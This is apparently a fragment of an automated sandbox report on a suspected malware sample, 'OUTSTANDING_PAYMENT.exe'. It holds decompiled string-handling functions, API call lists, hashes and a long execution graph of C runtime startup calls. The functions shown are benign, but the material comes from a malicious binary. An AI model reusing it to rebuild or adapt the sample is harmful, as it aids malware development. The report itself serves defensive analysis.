                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                        • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                        • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                                                        • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                        • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 77%
                                                                                                                        			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                                                                        0x00405f84
                                                                                                                        0x00405f8e
                                                                                                                        0x00405f91
                                                                                                                        0x00405f97
                                                                                                                        0x00405f98
                                                                                                                        0x00405f99
                                                                                                                        0x00405fa1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fa1
                                                                                                                        0x00405fa3
                                                                                                                        0x00405fab

                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,80000000,00000003), ref: 00405F89
                                                                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,80000000,00000003), ref: 00405F99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-1669384263
                                                                                                                        • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                        • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                                                        • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                        • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                        0x004060cd
                                                                                                                        0x004060cf
                                                                                                                        0x004060d2
                                                                                                                        0x004060fe
                                                                                                                        0x004060d7
                                                                                                                        0x004060e0
                                                                                                                        0x004060e5
                                                                                                                        0x004060f0
                                                                                                                        0x004060f3
                                                                                                                        0x0040610f
                                                                                                                        0x004060f5
                                                                                                                        0x004060fc
                                                                                                                        0x00000000
                                                                                                                        0x004060fc
                                                                                                                        0x00406108
                                                                                                                        0x0040610c
                                                                                                                        0x0040610c
                                                                                                                        0x00406106
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                                                                        • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0
                                                                                                                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                        • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                                                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                        • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:17.8%
                                                                                                                        Dynamic/Decrypted Code Coverage:5.7%
                                                                                                                        Signature Coverage:5.4%
                                                                                                                        Total number of Nodes:1962
                                                                                                                        Total number of Limit Nodes:116
                                                                                                                        execution_graph 8114 c56707 8115 c56450 __calloc_crt 68 API calls 8114->8115 8116 c56713 8115->8116 8117 c53f62 __encode_pointer 7 API calls 8116->8117 8118 c5671b 8117->8118 5951 c51d40 5990 c52d64 5951->5990 5953 c51d4c GetStartupInfoA 5954 c51d6f 5953->5954 5991 c52f4c HeapCreate 5954->5991 5957 c51dbf 5993 c54372 GetModuleHandleW 5957->5993 5961 c51dd0 __RTC_Initialize 6027 c5567a 5961->6027 5962 c51d17 _fast_error_exit 68 API calls 5962->5961 5964 c51dde 5965 c51dea GetCommandLineA 5964->5965 6127 c52fac 5964->6127 6042 c560f5 5965->6042 5972 c51e0f 6078 c55dc2 5972->6078 5973 c52fac __amsg_exit 68 API calls 5973->5972 5976 c51e20 6093 c5306b 5976->6093 5977 c52fac __amsg_exit 68 API calls 5977->5976 5979 c51e27 5980 c51e32 5979->5980 5981 c52fac __amsg_exit 68 API calls 5979->5981 6099 c55d63 5980->6099 5981->5980 5990->5953 5992 c51db3 5991->5992 5992->5957 6119 c51d17 5992->6119 5994 c54386 5993->5994 5995 c5438d 5993->5995 5998 c52f7c __crt_waiting_on_module_handle 2 API calls 5994->5998 5996 c544f5 5995->5996 5997 c54397 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5995->5997 6179 c5408c 5996->6179 5999 c543e0 TlsAlloc 5997->5999 6001 c5438c 5998->6001 6003 c51dc5 5999->6003 6004 c5442e TlsSetValue 5999->6004 6001->5995 6003->5961 6003->5962 6004->6003 6005 c5443f 6004->6005 6134 c53266 6005->6134 6008 c53f62 __encode_pointer 7 API calls 6009 c5444f 6008->6009 6010 c53f62 __encode_pointer 7 API calls 6009->6010 6011 c5445f 6010->6011 6012 c53f62 __encode_pointer 7 API calls 6011->6012 6013 c5446f 6012->6013 6014 c53f62 __encode_pointer 7 API calls 6013->6014 6015 c5447f 6014->6015 6141 c520f1 6015->6141 6022 c53fdd __decode_pointer 6 API calls 6023 c544d3 6022->6023 6023->5996 6024 c544da 6023->6024 6161 c540c9 6024->6161 6026 c544e2 GetCurrentThreadId 6026->6003 6509 c52d64 6027->6509 6029 c55686 GetStartupInfoA 6030 c56450 __calloc_crt 68 API calls 6029->6030 6038 c556a7 6030->6038 6031 c558c5 __setmbcp 6031->5964 6032 c55842 GetStdHandle 6037 c5580c 6032->6037 6033 c56450 __calloc_crt 68 API calls 6033->6038 6034 c558a7 SetHandleCount 6034->6031 6035 c55854 GetFileType 6035->6037 6036 c5578f 6036->6031 6036->6037 6039 c557b8 GetFileType 6036->6039 6041 c5631d __alloc_osfhnd InitializeCriticalSectionAndSpinCount 6036->6041 6037->6031 6037->6032 6037->6034 6037->6035 6040 c5631d __alloc_osfhnd InitializeCriticalSectionAndSpinCount 6037->6040 6038->6031 6038->6033 6038->6036 6038->6037 6039->6036 6040->6037 6041->6036 6043 c56132 6042->6043 6044 c56113 GetEnvironmentStringsW 6042->6044 6045 c561cb 6043->6045 6046 c5611b 6043->6046 6044->6046 6047 c56127 GetLastError 6044->6047 6048 c561d4 GetEnvironmentStrings 6045->6048 6051 c51dfa 6045->6051 6049 c5615d WideCharToMultiByte 6046->6049 6050 c5614e GetEnvironmentStringsW 6046->6050 6047->6043 6048->6051 6055 c561e4 6048->6055 6053 c56191 6049->6053 6054 c561c0 FreeEnvironmentStringsW 6049->6054 6050->6049 6050->6051 6067 c5603a 6051->6067 6057 c5640b __malloc_crt 68 API calls 6053->6057 6054->6051 6056 c5640b __malloc_crt 68 API calls 6055->6056 6058 c561fe 6056->6058 6059 c56197 6057->6059 6060 c56205 FreeEnvironmentStringsA 6058->6060 6061 c56211 ___crtGetEnvironmentStringsA 6058->6061 6059->6054 6062 c5619f WideCharToMultiByte 6059->6062 6060->6051 6065 c5621b FreeEnvironmentStringsA 6061->6065 6063 c561b1 6062->6063 6064 c561b9 6062->6064 6066 c5637d ___endstdio 68 API calls 6063->6066 6064->6054 6065->6051 6066->6064 6068 c56054 GetModuleFileNameA 6067->6068 6069 c5604f 6067->6069 6071 c5607b 6068->6071 6516 c53c1f 6069->6516 6510 c55ea0 6071->6510 6073 c51e04 6073->5972 6073->5973 6075 c5640b __malloc_crt 68 API calls 6076 c560bd 6075->6076 6076->6073 6077 c55ea0 _parse_cmdline 78 API calls 6076->6077 6077->6073 6079 c55dcb 6078->6079 6081 c55dd0 _strlen 6078->6081 6080 c53c1f ___initmbctable 112 API calls 6079->6080 6080->6081 6082 c56450 __calloc_crt 68 API calls 6081->6082 6086 c51e15 6081->6086 6083 c55e05 _strlen 6082->6083 6084 c55e63 6083->6084 6083->6086 6087 c56450 __calloc_crt 68 API calls 6083->6087 6088 c55e89 6083->6088 6089 c56d4b _strcpy_s 68 API calls 6083->6089 6091 c55e4a 6083->6091 6085 c5637d ___endstdio 68 API calls 6084->6085 6085->6086 6086->5976 6086->5977 6087->6083 6090 c5637d ___endstdio 68 API calls 6088->6090 6089->6083 6090->6086 6091->6083 6092 c5450e __invoke_watson 10 API calls 6091->6092 6092->6091 6094 c53079 __IsNonwritableInCurrentImage 6093->6094 6927 c5678b 6094->6927 6096 c53097 __initterm_e 6098 c530b6 __IsNonwritableInCurrentImage __initterm 6096->6098 6931 c56774 6096->6931 6098->5979 6100 c55d71 6099->6100 6103 c55d76 6099->6103 6101 c53c1f ___initmbctable 112 API calls 6100->6101 6101->6103 6102 c51e38 6105 c51000 6102->6105 6103->6102 6104 c59849 _parse_cmdline 78 API calls 6103->6104 6104->6103 7031 c51729 6105->7031 6109 c5103c 7047 c51b9a 6109->7047 6111 c51048 6112 c51c92 _fseek 106 API calls 6111->6112 6113 c5105b 6112->6113 6114 c51514 _malloc 68 API calls 6113->6114 6115 c51067 6114->6115 7060 c519e0 6115->7060 6120 c51d25 6119->6120 6121 c51d2a 6119->6121 6122 c5345f __FF_MSGBANNER 68 API calls 6120->6122 6123 c532b4 __NMSG_WRITE 68 API calls 6121->6123 6122->6121 6124 c51d32 6123->6124 6125 c53000 __mtinitlocknum 3 API calls 6124->6125 6126 c51d3c 6125->6126 6126->5957 6128 c5345f __FF_MSGBANNER 68 API calls 6127->6128 6129 c52fb6 6128->6129 6130 c532b4 __NMSG_WRITE 68 API calls 6129->6130 6131 c52fbe 6130->6131 6132 c53fdd __decode_pointer 6 API calls 6131->6132 6133 c51de9 6132->6133 6133->5965 6185 c53fd4 6134->6185 6136 c5326e __init_pointers __initp_misc_winsig 6188 c567e5 6136->6188 6139 c53f62 __encode_pointer 7 API calls 6140 c532aa 6139->6140 6140->6008 6142 c520fc 6141->6142 6144 c5212a 6142->6144 6191 c5631d 6142->6191 6144->5996 6145 c53fdd TlsGetValue 6144->6145 6146 c53ff5 6145->6146 6147 c54016 GetModuleHandleW 6145->6147 6146->6147 6148 c53fff TlsGetValue 6146->6148 6149 c54026 6147->6149 6150 c54031 GetProcAddress 6147->6150 6152 c5400a 6148->6152 6151 c52f7c __crt_waiting_on_module_handle 2 API calls 6149->6151 6154 c5400e 6150->6154 6153 c5402c 6151->6153 6152->6147 6152->6154 6153->6150 6153->6154 6154->5996 6155 c56450 6154->6155 6158 c56459 6155->6158 6157 c544b9 6157->5996 6157->6022 6158->6157 6159 c56477 Sleep 6158->6159 6196 c59861 6158->6196 6160 c5648c 6159->6160 6160->6157 6160->6158 6488 c52d64 6161->6488 6163 c540d5 GetModuleHandleW 6164 c540e5 6163->6164 6165 c540eb 6163->6165 6166 c52f7c __crt_waiting_on_module_handle 2 API calls 6164->6166 6167 c54127 6165->6167 6168 c54103 GetProcAddress GetProcAddress 6165->6168 6166->6165 6169 c5226d __lock 64 API calls 6167->6169 6168->6167 6170 c54146 InterlockedIncrement 6169->6170 6489 c5419e 6170->6489 6173 c5226d __lock 64 API calls 6174 c54167 6173->6174 6492 c53d86 InterlockedIncrement 6174->6492 6176 c54185 6504 c541a7 6176->6504 6178 c54192 __setmbcp 6178->6026 6180 c54096 6179->6180 6184 c540a2 6179->6184 6183 c53fdd __decode_pointer 6 API calls 6180->6183 6181 c540c4 6181->6181 6182 c540b6 TlsFree 6182->6181 6183->6184 6184->6181 6184->6182 6186 c53f62 __encode_pointer 7 API calls 6185->6186 6187 c53fdb 6186->6187 6187->6136 6189 c53f62 __encode_pointer 7 API calls 6188->6189 6190 c532a0 6189->6190 6190->6139 6195 c52d64 6191->6195 6193 c56329 InitializeCriticalSectionAndSpinCount 6194 c5636d __setmbcp 6193->6194 6194->6142 6195->6193 6197 c5986d __setmbcp 6196->6197 6198 c59885 6197->6198 6206 c598a4 _memset 6197->6206 6209 c534da 6198->6209 6201 c59916 RtlAllocateHeap 6201->6206 6205 c5989a __setmbcp 6205->6158 6206->6201 6206->6205 6215 c5226d 6206->6215 6222 c52a7f 6206->6222 6228 c5995d 6206->6228 6231 c53532 6206->6231 6234 c541b0 GetLastError 6209->6234 6211 c534df 6212 c54636 6211->6212 6213 c53fdd __decode_pointer 6 API calls 6212->6213 6214 c54646 __invoke_watson 6213->6214 6216 c52295 EnterCriticalSection 6215->6216 6217 c52282 6215->6217 6216->6206 6281 c521aa 6217->6281 6219 c52288 6219->6216 6220 c52fac __amsg_exit 67 API calls 6219->6220 6221 c52294 6220->6221 6221->6216 6224 c52aad 6222->6224 6223 c52b46 6227 c52b4f 6223->6227 6483 c52696 6223->6483 6224->6223 6224->6227 6476 c525e6 6224->6476 6227->6206 6487 c52193 LeaveCriticalSection 6228->6487 6230 c59964 6230->6206 6232 c53fdd __decode_pointer 6 API calls 6231->6232 6233 c53542 6232->6233 6233->6206 6248 c54058 TlsGetValue 6234->6248 6237 c5421d SetLastError 6237->6211 6238 c56450 __calloc_crt 65 API calls 6239 c541db 6238->6239 6239->6237 6240 c53fdd __decode_pointer 6 API calls 6239->6240 6241 c541f5 6240->6241 6242 c54214 6241->6242 6243 c541fc 6241->6243 6253 c5637d 6242->6253 6244 c540c9 __initptd 65 API calls 6243->6244 6246 c54204 GetCurrentThreadId 6244->6246 6246->6237 6247 c5421a 6247->6237 6249 c5406d 6248->6249 6250 c54088 6248->6250 6251 c53fdd __decode_pointer 6 API calls 6249->6251 6250->6237 6250->6238 6252 c54078 TlsSetValue 6251->6252 6252->6250 6255 c56389 __setmbcp 6253->6255 6254 c563c8 6256 c56402 __dosmaperr __setmbcp 6254->6256 6257 c563dd HeapFree 6254->6257 6255->6254 6255->6256 6258 c5226d __lock 66 API calls 6255->6258 6256->6247 6257->6256 6259 c563ef 6257->6259 6262 c563a0 ___sbh_find_block 6258->6262 6260 c534da __free_osfhnd 66 API calls 6259->6260 6261 c563f4 GetLastError 6260->6261 6261->6256 6265 c563ba 6262->6265 6266 c522d0 6262->6266 6273 c563d3 6265->6273 6267 c5230f 6266->6267 6272 c525b1 6266->6272 6268 c524fb VirtualFree 6267->6268 6267->6272 6269 c5255f 6268->6269 6270 c5256e VirtualFree HeapFree 6269->6270 6269->6272 6276 c51160 6270->6276 6272->6265 6280 c52193 LeaveCriticalSection 6273->6280 6275 c563da 6275->6254 6277 c51178 6276->6277 6278 c5119f __VEC_memcpy 6277->6278 6279 c511a7 6277->6279 6278->6279 6279->6272 6280->6275 6282 c521b6 __setmbcp 6281->6282 6283 c521c6 6282->6283 6284 c521de 6282->6284 6309 c5345f 6283->6309 6292 c521ec __setmbcp 6284->6292 6355 c5640b 6284->6355 6290 c5220d 6295 c5226d __lock 68 API calls 6290->6295 6291 c521fe 6294 c534da __free_osfhnd 68 API calls 6291->6294 6292->6219 6294->6292 6297 c52214 6295->6297 6299 c5221c 6297->6299 6300 c52248 6297->6300 6302 c5631d __alloc_osfhnd InitializeCriticalSectionAndSpinCount 6299->6302 6301 c5637d ___endstdio 68 API calls 6300->6301 6303 c52239 6301->6303 6304 c52227 6302->6304 6361 c52264 6303->6361 6304->6303 6306 c5637d ___endstdio 68 API calls 6304->6306 6307 c52233 6306->6307 6308 c534da __free_osfhnd 68 API calls 6307->6308 6308->6303 6364 c56db3 6309->6364 6311 c53473 6314 c532b4 __NMSG_WRITE 68 API calls 6311->6314 6316 c521cb 6311->6316 6313 c56db3 __set_error_mode 68 API calls 6313->6311 6315 c5348b 6314->6315 6317 c532b4 __NMSG_WRITE 68 API calls 6315->6317 6318 c532b4 6316->6318 6317->6316 6319 c532c8 6318->6319 6320 c56db3 __set_error_mode 65 API calls 6319->6320 6351 c521d2 6319->6351 6321 c532ea 6320->6321 6322 c53428 GetStdHandle 6321->6322 6324 c56db3 __set_error_mode 65 API calls 6321->6324 6323 c53436 _strlen 6322->6323 6322->6351 6327 c5344f WriteFile 6323->6327 6323->6351 6325 c532fb 6324->6325 6325->6322 6326 c5330d 6325->6326 6326->6351 6370 c56d4b 6326->6370 6327->6351 6330 c53343 GetModuleFileNameA 6332 c53361 6330->6332 6336 c53384 _strlen 6330->6336 6334 c56d4b _strcpy_s 65 API calls 6332->6334 6335 c53371 6334->6335 6335->6336 6338 c5450e __invoke_watson 10 API calls 6335->6338 6337 c533c7 6336->6337 6386 c56c03 6336->6386 6395 c56b8f 6337->6395 6338->6336 6343 c533eb 6344 c56b8f _strcat_s 65 API calls 6343->6344 6346 c533ff 6344->6346 6345 c5450e __invoke_watson 10 API calls 6345->6343 6348 c53410 6346->6348 6349 c5450e __invoke_watson 10 API calls 6346->6349 6347 c5450e __invoke_watson 10 API calls 6347->6337 6404 c56a26 6348->6404 6349->6348 6352 c53000 6351->6352 6442 c52fd5 GetModuleHandleW 6352->6442 6357 c56414 6355->6357 6358 c521f7 6357->6358 6359 c5642b Sleep 6357->6359 6445 c51514 6357->6445 6358->6290 6358->6291 6360 c56440 6359->6360 6360->6357 6360->6358 6475 c52193 LeaveCriticalSection 6361->6475 6363 c5226b 6363->6292 6365 c56dc2 6364->6365 6366 c534da __free_osfhnd 68 API calls 6365->6366 6367 c53466 6365->6367 6368 c56de5 6366->6368 6367->6311 6367->6313 6369 c54636 __openfile 6 API calls 6368->6369 6369->6367 6371 c56d63 6370->6371 6372 c56d5c 6370->6372 6373 c534da __free_osfhnd 68 API calls 6371->6373 6372->6371 6375 c56d89 6372->6375 6378 c56d68 6373->6378 6374 c54636 __openfile 6 API calls 6376 c5332f 6374->6376 6375->6376 6377 c534da __free_osfhnd 68 API calls 6375->6377 6376->6330 6379 c5450e 6376->6379 6377->6378 6378->6374 6431 c55600 6379->6431 6381 c5453b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6382 c54617 GetCurrentProcess TerminateProcess 6381->6382 6383 c5460b __invoke_watson 6381->6383 6433 c564ea 6382->6433 6383->6382 6385 c53340 6385->6330 6390 c56c15 6386->6390 6387 c56c19 6388 c533b4 6387->6388 6389 c534da __free_osfhnd 68 API calls 6387->6389 6388->6337 6388->6347 6391 c56c35 6389->6391 6390->6387 6390->6388 6393 c56c5f 6390->6393 6392 c54636 __openfile 6 API calls 6391->6392 6392->6388 6393->6388 6394 c534da __free_osfhnd 68 API calls 6393->6394 6394->6391 6396 c56ba7 6395->6396 6399 c56ba0 6395->6399 6397 c534da __free_osfhnd 68 API calls 6396->6397 6398 c56bac 6397->6398 6400 c54636 __openfile 6 API calls 6398->6400 6399->6396 6401 c56bdb 6399->6401 6402 c533da 6400->6402 6401->6402 6403 c534da __free_osfhnd 68 API calls 6401->6403 6402->6343 6402->6345 6403->6398 6405 c53fd4 _raise 7 API calls 6404->6405 6406 c56a36 6405->6406 6407 c56a49 LoadLibraryA 6406->6407 6412 c56ad1 6406->6412 6408 c56a5e GetProcAddress 6407->6408 6409 c56b73 6407->6409 6408->6409 6410 c56a74 6408->6410 6409->6351 6414 c53f62 __encode_pointer 7 API calls 6410->6414 6411 c56afb 6416 c53fdd __decode_pointer 6 API calls 6411->6416 6430 c56b26 6411->6430 6412->6411 6413 c53fdd __decode_pointer 6 API calls 6412->6413 6417 c56aee 6413->6417 6418 c56a7a GetProcAddress 6414->6418 6415 c53fdd __decode_pointer 6 API calls 6415->6409 6424 c56b3e 6416->6424 6419 c53fdd __decode_pointer 6 API calls 6417->6419 6420 c53f62 __encode_pointer 7 API calls 6418->6420 6419->6411 6421 c56a8f GetProcAddress 6420->6421 6422 c53f62 __encode_pointer 7 API calls 6421->6422 6423 c56aa4 GetProcAddress 6422->6423 6425 c53f62 __encode_pointer 7 API calls 6423->6425 6426 c53fdd __decode_pointer 6 API calls 6424->6426 6424->6430 6427 c56ab9 6425->6427 6426->6430 6427->6412 6428 c56ac3 GetProcAddress 6427->6428 6429 c53f62 __encode_pointer 7 API calls 6428->6429 6429->6412 6430->6415 6432 c5560c __VEC_memzero 6431->6432 6432->6381 6434 c564f4 IsDebuggerPresent 6433->6434 6435 c564f2 6433->6435 6441 c57bc0 6434->6441 6435->6385 6438 c59c67 SetUnhandledExceptionFilter UnhandledExceptionFilter 6439 c59c84 __invoke_watson 6438->6439 6440 c59c8c GetCurrentProcess TerminateProcess 6438->6440 6439->6440 6440->6385 6441->6438 6443 c52ff9 ExitProcess 6442->6443 6444 c52fe9 GetProcAddress 6442->6444 6444->6443 6446 c515c7 6445->6446 6447 c51526 6445->6447 6448 c53532 _realloc 6 API calls 6446->6448 6450 c51537 6447->6450 6454 c515bf 6447->6454 6456 c51583 RtlAllocateHeap 6447->6456 6458 c515b3 6447->6458 6459 c53532 _realloc 6 API calls 6447->6459 6461 c515b8 6447->6461 6463 c514c5 6447->6463 6449 c515cd 6448->6449 6451 c534da __free_osfhnd 67 API calls 6449->6451 6450->6447 6452 c5345f __FF_MSGBANNER 67 API calls 6450->6452 6453 c532b4 __NMSG_WRITE 67 API calls 6450->6453 6457 c53000 __mtinitlocknum 3 API calls 6450->6457 6451->6454 6452->6450 6453->6450 6454->6357 6456->6447 6457->6450 6460 c534da __free_osfhnd 67 API calls 6458->6460 6459->6447 6460->6461 6462 c534da __free_osfhnd 67 API calls 6461->6462 6462->6454 6464 c514d1 __setmbcp 6463->6464 6465 c51502 __setmbcp 6464->6465 6466 c5226d __lock 68 API calls 6464->6466 6465->6447 6467 c514e7 6466->6467 6468 c52a7f ___sbh_alloc_block 5 API calls 6467->6468 6469 c514f2 6468->6469 6471 c5150b 6469->6471 6474 c52193 LeaveCriticalSection 6471->6474 6473 c51512 6473->6465 6474->6473 6475->6363 6477 c5262d HeapAlloc 6476->6477 6478 c525f9 HeapReAlloc 6476->6478 6479 c52617 6477->6479 6480 c52650 VirtualAlloc 6477->6480 6478->6479 6481 c5261b 6478->6481 6479->6223 6480->6479 6482 c5266a HeapFree 6480->6482 6481->6477 6482->6479 6484 c526ad VirtualAlloc 6483->6484 6486 c526f4 6484->6486 6486->6227 6487->6230 6488->6163 6507 c52193 LeaveCriticalSection 6489->6507 6491 c54160 6491->6173 6493 c53da4 InterlockedIncrement 6492->6493 6494 c53da7 6492->6494 6493->6494 6495 c53db4 6494->6495 6496 c53db1 InterlockedIncrement 6494->6496 6497 c53dc1 6495->6497 6498 c53dbe InterlockedIncrement 6495->6498 6496->6495 6499 c53dcb InterlockedIncrement 6497->6499 6501 c53dce 6497->6501 6498->6497 6499->6501 6500 c53de7 InterlockedIncrement 6500->6501 6501->6500 6502 c53df7 InterlockedIncrement 6501->6502 6503 c53e02 InterlockedIncrement 6501->6503 6502->6501 6503->6176 6508 c52193 LeaveCriticalSection 6504->6508 6506 c541ae 6506->6178 6507->6491 6508->6506 6509->6029 6512 c55ebf 6510->6512 6514 c55f2c 6512->6514 6520 c59849 6512->6520 6513 c5602a 6513->6073 6513->6075 6514->6513 6515 c59849 78 API calls _parse_cmdline 6514->6515 6515->6514 6517 c53c28 6516->6517 6518 c53c2f 6516->6518 6742 c53a85 6517->6742 6518->6068 6523 c597f6 6520->6523 6526 c515de 6523->6526 6527 c515f1 6526->6527 6528 c5163e 6526->6528 6534 c54229 6527->6534 6528->6512 6531 c5161e 6531->6528 6554 c53780 6531->6554 6535 c541b0 __getptd_noexit 68 API calls 6534->6535 6536 c54231 6535->6536 6537 c515f6 6536->6537 6538 c52fac __amsg_exit 68 API calls 6536->6538 6537->6531 6539 c53eec 6537->6539 6538->6537 6540 c53ef8 __setmbcp 6539->6540 6541 c54229 __getptd 68 API calls 6540->6541 6542 c53efd 6541->6542 6543 c53f2b 6542->6543 6544 c53f0f 6542->6544 6545 c5226d __lock 68 API calls 6543->6545 6546 c54229 __getptd 68 API calls 6544->6546 6547 c53f32 6545->6547 6551 c53f14 6546->6551 6570 c53eae 6547->6570 6552 c52fac __amsg_exit 68 API calls 6551->6552 6553 c53f22 __setmbcp 6551->6553 6552->6553 6553->6531 6555 c5378c __setmbcp 6554->6555 6556 c54229 __getptd 68 API calls 6555->6556 6557 c53791 6556->6557 6558 c5226d __lock 68 API calls 6557->6558 6559 c537a3 6557->6559 6560 c537c1 6558->6560 6562 c537b1 __setmbcp 6559->6562 6566 c52fac __amsg_exit 68 API calls 6559->6566 6561 c5380a 6560->6561 6563 c537f2 InterlockedIncrement 6560->6563 6564 c537d8 InterlockedDecrement 6560->6564 6738 c5381b 6561->6738 6562->6528 6563->6561 